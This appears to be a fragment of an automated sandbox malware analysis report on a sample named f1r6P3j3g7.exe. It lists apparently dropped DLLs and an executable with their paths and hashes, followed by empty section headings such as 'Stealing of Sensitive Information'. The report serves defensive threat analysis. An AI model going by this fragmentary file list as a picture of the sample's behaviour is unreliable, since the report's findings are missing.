C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	8E704ACD1B0C26FDCFD0374D57FCB28E	157B61A24087521693C8ACA743D60E4C33CB803D	6C7818A65F46711FBC89CD7B548829E98BE247FAB8B2C4766C85B64BC632E797
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	90E744829865D57082A7F452EDC90DE5	833B178775F39675FA4E55EAB1032353514E1052	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
C:\Users\user\AppData\Local\Temp\delays.tmp	ASCII text, with very long lines (65536), with no line terminators	7EFA48B0AA3F7E4F68929222AAE0609F	380DBFEEEF0FA7924FAEE27A8C442FD0E8D26993	A174584309C1B2B205AD342333F92B1FE2A815763D3FF9688A278D730776DC3C
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	3AFDBCF60974395B34F26ED26DC1D1D2	07D8483C4217FC2DD673F61CC96466F46B1499F4	E60925F1002457EC246D22B73A03439B7CFABC724687A6FE7C74CE0806FF75EB

Windows Analysis Report f1r6P3j3g7.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
f1r6P3j3g7.exe

Malware Threat Intel
Provided by